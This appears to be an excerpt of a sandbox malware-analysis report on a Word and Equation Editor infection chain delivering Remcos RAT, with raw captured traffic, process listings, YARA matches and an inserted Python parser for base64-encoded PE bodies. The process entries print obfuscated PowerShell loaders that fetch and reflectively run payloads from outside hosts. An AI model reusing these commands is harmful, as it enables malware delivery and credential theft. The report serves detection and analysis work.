                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                                                Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                                                Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                                                Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                                                Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                                                Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                                                Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA
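Session 5 is the 32-bit powershell.exe (PID 4004) pulling a 2.9 MB "text" file from raw.githubusercontent.com with no User-Agent header at all. The body is not text: it starts with "TVqQ", which is base64 for "MZ" followed by 0x90, and decoding the first data chunk shows the "This program cannot be run in DOS mode" stub, so the .txt is a base64-encoded PE that the PowerShell stage decodes in memory. The following is an added example of recognising and characterising such a body; it is not Joe Sandbox code. MZ_DOTNET_B64 is the first 208 characters of the captured body shown above, rebuilt in groups for readability, and the header values it yields (i386 machine, 3 sections, PE32, DLL flag, linker version 48.0 as emitted by the .NET compiler) are what the parser returns for it.

```python
"""Recognise and characterise a base64-encoded PE in an HTTP body.

Added example, not Joe Sandbox code.  MZ_DOTNET_B64 is the first 208
characters of the body captured in session 5 above, split into groups
for readability.
"""
import base64
import struct

MZ_DOTNET_B64 = (
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAA" + "A" * 44          # DOS header
    + "gAAAAA4fug4AtAnNIbgBTM0h"                              # e_lfanew = 0x80, stub code
    + "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K"  # stub message
    + "JAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAA"      # "$", PE\0\0, COFF header, optional header start
)

IMAGE_FILE_DLL = 0x2000
MACHINE_NAMES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "ARM64"}


def decode_b64_prefix(text: str) -> bytes:
    """Decode as much of a (possibly truncated) base64 stream as is complete."""
    compact = "".join(text.split())
    compact = compact[: len(compact) - len(compact) % 4]  # drop a trailing partial quantum
    return base64.b64decode(compact)


def looks_like_b64_pe(text: str) -> bool:
    """Cheap body check: base64 of 'MZ' + 0x90 is 'TVqQ'; 'MZ' + 0x00 is 'TVoA'."""
    return text.lstrip()[:4] in ("TVqQ", "TVoA")


def parse_pe_prefix(data: bytes) -> dict:
    """Pull the triage-relevant fields out of the DOS, COFF and optional headers."""
    info = {"is_mz": data[:2] == b"MZ"}
    if not info["is_mz"] or len(data) < 0x40:
        return info
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    info["e_lfanew"] = e_lfanew
    if len(data) < e_lfanew + 24 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        info["pe_signature"] = False
        return info
    info["pe_signature"] = True
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    (machine, num_sections, timestamp, _symtab, _nsyms,
     size_optional, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    info.update(machine=machine, machine_name=MACHINE_NAMES.get(machine, hex(machine)),
                num_sections=num_sections, timestamp=timestamp,
                size_optional=size_optional, characteristics=characteristics,
                is_dll=bool(characteristics & IMAGE_FILE_DLL))
    # Optional header: Magic (0x10B = PE32, 0x20B = PE32+), MajorLinkerVersion, MinorLinkerVersion
    if len(data) >= e_lfanew + 28:
        magic, linker_major, linker_minor = struct.unpack_from("<HBB", data, e_lfanew + 24)
        info.update(opt_magic=magic, is_pe32plus=(magic == 0x20B),
                    linker_version=(linker_major, linker_minor))
    return info


def characterise_body(text: str) -> dict:
    """Entry point for a captured HTTP body: {} if it is not a base64 PE."""
    if not looks_like_b64_pe(text):
        return {}
    return parse_pe_prefix(decode_b64_prefix(text))


if __name__ == "__main__":
    for key, value in characterise_body(MZ_DOTNET_B64).items():
        print(f"{key:16} {value if not isinstance(value, int) else hex(value)}")
```

The point of parsing rather than just matching "TVqQ" is that a proxy or sandbox can then tag the download with what it actually is (here a PE32 DLL built by a .NET linker, consistent with the Remcos loader chain this report attributes to powershell.exe) without waiting for the full 2.9 MB body; only the first 156 decoded bytes are needed.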



                                                                                                                                Target ID:0
                                                                                                                                Start time:03:25:03
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                Imagebase:0x13f920000
                                                                                                                                File size:1'423'704 bytes
                                                                                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:8
                                                                                                                                Start time:03:25:20
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:543'304 bytes
                                                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:9
                                                                                                                                Start time:03:25:22
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS"
                                                                                                                                Imagebase:0x280000
                                                                                                                                File size:141'824 bytes
                                                                                                                                MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:10
                                                                                                                                Start time:03:25:22
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                Imagebase:0xf90000
                                                                                                                                File size:427'008 bytes
                                                                                                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:12
                                                                                                                                Start time:03:25:23
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"
                                                                                                                                Imagebase:0xf90000
                                                                                                                                File size:427'008 bytes
                                                                                                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:13
                                                                                                                                Start time:03:25:29
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:14
                                                                                                                                Start time:03:25:36
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:15
                                                                                                                                Start time:03:25:36
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:16
                                                                                                                                Start time:03:25:36
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twmgvffrxjktbjyahjdg"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:17
                                                                                                                                Start time:03:25:36
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vyrywypslrcydpuequqaufz"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:19
                                                                                                                                Start time:03:29:16
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\irflzfvzpruafqgyqnkxgb"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:20
                                                                                                                                Start time:03:29:16
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\algvnlhhqgudzwxguvhnulfpxhl"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:21
                                                                                                                                Start time:03:29:16
                                                                                                                                Start date:01/10/2024
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\srzilnhhbbbtiyigffpvarsgam"
                                                                                                                                Imagebase:0x920000
                                                                                                                                File size:64'704 bytes
                                                                                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.411323631.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7fd3633431008202ca01e707f00d3b9b8c8eca4fadf21f1b4af3f38c63a2d101
                                                                                                                                  • Instruction ID: 50723fd4d13d9c0dd15782d537dc288d4618d251744ad2c610ae78addeb88bed
                                                                                                                                  • Opcode Fuzzy Hash: 7fd3633431008202ca01e707f00d3b9b8c8eca4fadf21f1b4af3f38c63a2d101
                                                                                                                                  • Instruction Fuzzy Hash: E001F231504340AFEB104F26ECC4B67FB98EF41764F2C851AFC490B286C37A9841CAB2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.411323631.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e57719f9ca916e6f7cde899bf989cb57e1c531e110bd6514ac57008db9c15c78
                                                                                                                                  • Instruction ID: 4ec17db8173190a02f123ac40b93c2a1b5b7e4f90d5304c5bdc9202babc8eed9
                                                                                                                                  • Opcode Fuzzy Hash: e57719f9ca916e6f7cde899bf989cb57e1c531e110bd6514ac57008db9c15c78
                                                                                                                                  • Instruction Fuzzy Hash: DCF0CD71504340AFEB108E16DCC4B67FBA8EB81724F28C45AFC484A286C37A9C44CAB1

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:3.8%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:0%
